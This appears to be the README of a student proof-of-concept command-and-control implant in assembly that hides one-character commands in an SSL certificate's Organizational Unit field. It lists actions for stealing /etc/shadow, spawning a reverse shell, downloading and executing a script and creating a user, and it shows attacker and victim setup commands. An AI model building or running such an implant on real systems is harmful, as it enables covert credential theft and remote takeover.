Simple C&C example in assembly that retrieves commands from the Organizational Unit (OU) field in an SSL certificate
Simple C&C example in assembly that retrieves commands from the Organizational Unit (OU) field in an SSL certificate. Definitely far from being really done, but a cool proof-of-concept. This was my final project for CSC 314 @ DSU.
In order to make the attacker's host look inconspicuous, the commands are found in the OU field and only contain 1 character that represents certain actions. The supported actions are:
/etc/shadow
, will be posted & saved to our serverAttacker Server:
ubuntu@attacker:~$ ./gencert.py your.domain
1: steal /etc/shadow
2: spawn reverse shell
3: download & execute script
4: create new user
option > 1
ubuntu@attacker:~$ go build server.go
ubuntu@attacker:~$ sudo ./server
Victim Server:
root@victim:~$ cd cnc && make
root@victim:~$ ./cnc